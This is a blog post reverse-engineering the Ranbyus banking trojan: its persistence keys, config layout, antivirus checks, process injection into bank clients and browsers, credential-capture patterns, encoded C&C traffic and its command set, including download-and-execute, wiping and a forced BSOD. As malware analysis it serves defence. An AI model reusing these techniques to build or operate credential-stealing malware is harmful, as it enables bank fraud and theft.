0x16/7ton

 photo doc155602017_152116624_zpsa322a969.gif

воскресенье, 3 февраля 2013 г.

Trojan.Win32/Spy.Ranbyus

[General View]


Before you start reading my notes about this malware,read another articles:
Ok,now let's look at the bot's pe image.It hasn't import,most strings are encrypted.
After some reversing I understood calling api format for that malware,look at this picture:









Every time when bot wants call the api,he gets pointer on api-table buffer(at the picture that pointer is in register eax) and chooses desirable function by index(at picture this is 0x13c)
To make analyze better I've made this api-table:
http://pastebin.com/g0MXyTnr
Also here are my ida-python script for decrypting strings:
http://pastebin.com/F5MSe6BD

[Malware Installing]

 

Installation in the system is very trivial.
First of all, malware tries drop itself in two possible ways:
  • in system directory (GetSystemDirectory)
  • in temp directory (GetTempPath)
Dropped filenames hardcoded in my sample:
  • ifkf_mfLEnWa_g.exe
  • BlvyLYGJKTTLK_gTzE.exe
All new files get original file time kernel32.dll.
Here are autorun registry keys, that bot uses:
  • Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
  • Software\Microsoft\Windows\CurrentVersion\Run
  • SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run (x64)
Name of registry key, which bot uses for autorunning:LmihNjzSczsUOFeQZJkVKCBFoz
Also in registry,malware stores main config:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Key name SysDebug32
Config encrypted by the same algorithm, which used for decrypting stringsBelow you can see the structure of the config:
config total size ==0x312 

BotConfig
Offset
Field name
0x0
char* host_url (C&C url)
0x64
char* botID (see below description)
0x96
bool block_bank_client_Work_1 (checked in java injection code)
0x97
bool block_bank_client_Work_2 (checked in java injection code)
0x98
bool block_bank_client_Work_3 (checked in java injection code)
0x99
bool block_bank_client_Work_4 (checked in cbmain.ex injection code)
0x9D
bool block_bank_client_Work_5 (checked in wclnt.exe,ip-client.exe,rclient.exe injection code)
0x9F
bool block_bank_client_Work_6 (checked in tiny.exe injection code)
0xAE
??
0xB2
??
0xBA
bool ProxyMode
0xBB
DWORD netAddr (proxy backconnect address)
0xBF
WORD port (proxy backconnect port)
0xC1
DWORD send_net_reques (if set to 1,bot send Net_Request)
0xC5
??
0xC9
DWORD rand
0xCD
DWORD rand
0xD1
struct FILETIME (Bot up time GetSystemTime->SystemTimeToFileTime)
0xD9
??
0xDB
??
0x1A1
??
0x30E
DWORD hash_config (used for checking integrity config)


[AVdetecting]

 

Bot enumerates processes and searches av vendors software:
Kaspersky
ESET
AVG
Avira
Avast
Norton Antivirus
McAfee
Panda Antivurus
Comodo
DrWeb


After this check he sends request to C&C, with request type AV_check (see below description).
Bot afraid of Kaspersky,so if he find his active process,he doesn't install in the system.
Also in him exists funny-useless code to killing ESET gui process (egui.exe).
In that code,he just trying open process with PROCESS_TERMINATE access,and terminate..So this is fucking disaster!


[InjectionCode]


Mechanism of injection in malware - it's just CreateRemoteThread.
Bot injects main payload code to another processes:
  • on x86 systems it is svchost.exe
  • on x64 systems it is explorer.exe (it creates process of explorer and injects)

Bot has hardcoded table, which consits of hash of the process name and code injection function.
In that sample which I have, some process names in table haven't injection code..Probably it's customizing during building bot.
Here I've gathered information about all processes, which I've found in the table below:

Table of process names used in malware for injection code
Company(Software)Name
Url
Image name
Injection Code
BSS DBO Bank-Client http://www.bssys.com/en/ cbmain.ex yes
Western Union http://www.westernunion.com translink.exe yes
SberBank Bank-Client http://www.sbrf.ru/en/ wclnt.exe yes
KazKom bank cilent http://en.kkb.kz/ rclient.exe yes
WebMoney Transfer http://www.wmtransfer.com/ webmoney.exe yes
Contact Money transfer system http://www.contact-sys.com/eng/index.phtml contactNG.exe yes
CBS scrooge http://eng.lime-systems.com/ tiny.exe yes
Unisteam Money Transfer http://intl.unistream.com UniStream.exe yes
Baltic Bank client http://www.baltbank.ru/bc/ BBClient.exe yes
Mozilla Firefox http://www.mozilla.org/en-US/ firefox.exe yes
Opera http://www.opera.com/ opera.exe yes
Safari Browser http://support.apple.com/kb/DL1531 safari.exe yes
Microsoft http://windows.microsoft.com iexplore.exe yes
Oracle http://www.oracle.com/index.html java.exe,javaw.exe yes
Putty SSH and telnet client http://www.putty.org putty.exe yes
IntrustBank client http://www.intrustbank.ru/ clntw32.exe no
Bank client http://www.rpb.ru/doc/doku.php?id=goststart intpro.exe no
Credit bank of Moscow http://english.mkb.ru/ bc_loader.exe no
B24 bank client http://www.bank24.ru/ iscc.exe no
Inbank bank client https://inbank.org/ inbank-start-ff.exe no
UralSib bank client http://www.bankuralsib.ru/index.wbp kb_cli.exe,kb_cli.ex no
Unknown bank client -/- bankcl.exe no
Unknown bank client -/- bk.exe no
Microsoft http://windows.microsoft.com ntvdm.exe no
Unknown bank client -/- startclient7.exe no
Chelyabinsk bank client http://www.chelinvest.ru/ el_cli.ex no
Unknown bank client -/- clbank.exe no
Unknown bank client -/- oncbcli.exe no
Unknown bank client -/- clmain.exe no
RegionBank client http://www.nomos-regiobank.ru/ elbank.exe no
BiKript bank client http://www.s3bank.ru/corp/client-bank/index.phtml/ ISClient.exe no
SGB bank client http://www.severgazbank.ru/ sgbclient.exe no
MFbank client http://www.mfbank.ru/index.php loadmain.exe no
Unknown -/- selva_copy.exe no
Unknown bank client -/- client7.exe no
Unknown bank client -/- bclient.exe no
Bank+ client http://cbs.inversion.ru/ cbsmain.exe no

Here are examples of payload for some processes:

Firefox,Iexplore,Opera,Safari payload
Delete all .ibank* file in systemroot/system32/java/ and %USERPOFILE% directory
Hook functions:
     wininet.dll
          HttpSendRequestW
          HttpSendRequestA
          HttpSendRequestExA
          InternetWriteFile
Firefox specific hook
      NSPR4.dll
           PR_write
In the handler of hooked function, it monitors access to online-banks by template.
Here are pattern strings, which it uses:
          https:\/\/ibank.prbb.ru
          https:\/\/ibank.alfabank.ru
          auth-attr-\d+-param1=.*&auth-attr-\d+-param2=.*
          \/servlets\/mbo
          \/servlets\/ibc
          /bsi.dll
          username=.*&password=.*

wclnt.exe,rclient.exe,ipclient.exe process payload
Hook function:
       kernel32.dll
             CreateFile
In the handler of the hooked function, it captures and sends on C&C key files(see below
Send_key_file_request):
        sign.key,master.key,UZ.DB3,GK.DB3


In general, injected payload looks similar,and most of them based on searching windows,taking screenshots,grabbing information from windows.Here are a table of searched windows(some of them written in Russian):

Searched windows table
Window Class
Window Caption
SunAwtDialog Вход в систему,Синхронизация с Банком
SunAwtFrame Вход в систему,Welcome
javax.swing.JFrame Вход в систему,Welcome
MSAWT_Comp_Class Вход в систему,Welcome
PuTTY -/-
TLoginWindow Логин
TGetOper Вход в систему
ThunderRT6FormDC Western Union Translink
TfAuthNew Tiny Client-Bank
WebMoney Keeper Classic Идентификация пользователя
UNIStreamR. Аутентификация. -/-

 

[NetworkActivity]

 

 

I identified three main parts of network for this bot:

-Sending information and geting tasks from C&C ,by http get-post requests.
-Binding port,for accepting incoming connections,to enable remote access to smart-card.
-Supporting reverse (backconnect) proxy SOCKS5

Bot uses traffic encryption by custom base64 algorithm with that alphabet:
"qBPTD5ZQcnLOjobYMd6JSEU1Ifv89G4RsXwe3yaKmFCAipurl0/t2VzxN+7khgHW="
So it is pretty easy to decrypt traffic with tool like this:
http://www.kahusecurity.com/2011/custom-base64-decoder/


Typical bot's request looks like:
------------------------------------------------------------------------------------
POST /releases/index.php HTTP/1.1
Content-Type: multipart/form-data, boundary=7DD02020A0D0000
User-Agent: gsa-crawler
Host: ___.__
Content-Length: 226
Connection: Keep-Alive
Cache-Control: no-cache

--7DD02020A0D0000
Content-Disposition: form-data; name="q"
vUMgjQs0ow2xoty3oJn3jt9z1tjtfJnybZda1zEwjJ9toUSxnKoy9xoF8zNgjesNbTs+oes+owfzYJDzot9+jTDlna+X8USgvzEu8/fpve2VnaVFYJDa9QMgj6fwYJczjTqafZjgjtcaGT2tje9xjq==
--7DD02020A0D0000
Content-Disposition: form-data; name="data"; filename="new_file"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary


J3gS6SffbwB1fUno8z+y46+y4ZS=

--7DD02020A0D0000--

------------------------------------------------------------------------------------
Okay,lets parse this:
Blue color :    static value
Green color:   boundary,generated by GetSystemTime with format string
%02X%02X%02X%02X%02X%04X
Purple color : random useragent,see below all possible values from table.
Orange color: header of request message,so  here are example how it looks decrypted
id=0x16-779d52d376_33e2e8df_eb1735e7&session=2458654464&v=16779010&name=keno&mj=5&mi=1&pt=1&b=2600&dc=32
format string:
id=%s&session=%u&v=%u&name=%s&mj=%u&mi=%u&pt=%u&b=%u&dc=%u
id=BotId,generated by host name,and two magic dwords,calc by the main encryption algoritm (part of key table generation),but with using another alphabet:
      STORAGE_DEVICE_DESCRIPTOR serial number and product id in first round
      IP_ADAPTER_INFO.address in second round
session=random value
v= bot version number (constant value) 
name=bot build name (constant string) 
mj=MajorVersion Windows
mi=MinorVersion Windows
pt=ProductType Windows
b=BuildNumber Windows
dc=processor arch model (x86/x64)

Aqua color: request type,see below type table
Red color:   this is data of request

User agent table
Firefly/1.0 (compatible; Mozilla 4.0; MSIE 5.5)
FlashGet
Flexum/2.0
FreshDownload/x.xx
FavIconizer
DeepIndex
gsa-crawler
ContentSmartz
Mozilla/4.0 (compatible; MSIE 4.01; AOL 4.0; Windows 98)
Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) TrueRobot; 1.5
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon)
Mozilla/5.0 (compatible; TridentSpider/3.1)
NationalDirectoryAddURL/1.0
NETCOMplete/x.xx
Nocilla/1.0
OliverPerry
OpenTextSiteCrawler/2.9.2
Opera/8.xx (Windows NT 5.1; U; en)
Opera/9.00 (Windows NT 5.1; U; de)
PHP/4.0.6
PHP/4.1.2
Popdexter/1.0
PureSight
RAYSPIDER/Nutch-0.9
Scooter-3.2.EX
SearchdayBot
ShablastBot 1.0
SiteXpert
TeamSoft WinInet Component
Toutatis x.x-x
URLBase/6.x
WebCorp/1.0
Y!J-SRD/1.0
Yeti
Zend_Http_Client 


Request Type table
Request type name
Request Parameters
Additional Description
AV_check
&av=%d
Send request about working av soft
Check_token
&token=0 (token not exist)
&token=1 (token exist)

Send_key_file_request
&cb=1
Send bank client key file
Excep_request
&exception
Send when in bot occurred unhandled exception.
Alr_load_request
&lr=1
Send when failed create mutex,detecting already running bot.
SendFile_Request
&file=1 (File not found)
&file=2 (send file in cab file)

Comm_compl_request
&cmd=1
Send when command get from C&C completed.
Load_execute_request
&load=1 (Success)
&load=2 (failed)

Net_Request
&net=1
Send bot network information
Key_request
&keys=1
Send when found .jks key
Screen_request
&screen=1
Send when make screenshot,(in cab file screenshot)
Notify_request
&t=%d (random)
Send when injected in process (in data of request NOTIFY:%processname%)


Bot asks C&C for the tasks in the loop by sending requests.
Here are how typical task request from C&C and answer look like:





















Below is the structure of a response from the C&C
Task Message:
   DWORD count_param
   DWORD command
   BYTE     data []


Command table
Command
Description
0x2
Bot SelfUpdate
0x3
Enable blocking bank client (set to true state block_bank_client_Work_1,block_bank_client_Work_2 in config)
0x4
Disable blocking bank client (set to false state block_bank_client_Work_1,block_bank_client_Work_2 in config)
0x5
Enable blocking bank client (set to true state block_bank_client_Work_3 in config)
0x6
Disable blocking bank client (set to true state block_bank_client_Work_3 in config)
0x7
Enable Proxy Mode (set ProxyMode to true state,set netAddr and port in config)
0x8
Disable Proxy Mode (set ProxyMode to false state in config)
0x9
Get list of file from all volume (if data[] ==NULL),or search file (mask filename in data[]),SendFile_Request
0x0A
Download file from url (get in data[]) by get request,and execute them.Send Load_execute request.
0x0C
Search key file(search mask *.jks ),send Key_request.
0x0D
Kill OS(delete file *.*,make BSOD like in 0x11 command)
0x0E
Bot Self deleting
0x0F
Send bot network information (Net_Request)
0x10
Reboot System
0x11     
BSOD system (inject in csrss thread,in injected thread make exception)
0x12
Set to 1 value in offset 0xC5 (unknown)
0x13
Set to 0 value in offset 0xC5 (unknown)
0x14
Update C&C url address in config (field host_url)
0x15
Enable blocking bank client (set to true state block_bank_client_Work_4 in config)
0x16
Disable blocking bank client (set to false state block_bank_client_Work_4 in config)
0x19
Enable blocking bank client (set to true state block_bank_client_work_5 in config)
0x1B
Load and laucnh module.
0x1C
Make Screenshot,send Screen_request
0x20
Disable blocking bank client (set to false state block_bank_client_work_5 in config)


If in task cycle C&C not responds bot can update config to use second url C&C.

As I said,bot binds port(0x165a) for supporting remote control of smart-card.
In simplified manner, commands give ability to use these api:

0x0     SCardStatusA
0x1     SCardGetStatusChangeA
0x2     SCardDisconnect
0x3     SCardControl
0x4     SCardEstablishContext
0x5     SCardListReadersA
0x6     SCardConnectA
0x7     SCardBeginTransaction
0x8     SCardEndTransaction
0x9     SCardTransmit
0xa     SCardGetAttrib


Some additional information about C&C struct directory(not all of course):

/releases 
      avs.php
      base64.php
      commands.php
      config.php
      stat.php
      getrc.php

      /inc
          jabber.php
          thumbnail.php

      /modules
      /default
            /32
            /64     
      /other
      /_screenshots
              /1004 (example)
      /_files



[Conclusion]



I still haven't described a lot in this bot,reverse proxy protocol,java patching and etc. Maybe I forgot something,or another shit.
But finally,my target was just show you a paradox:
bots with simple architecture still working effectively and still steal money.

Thanks for reading ^_^
---------------------------
Cause and effect.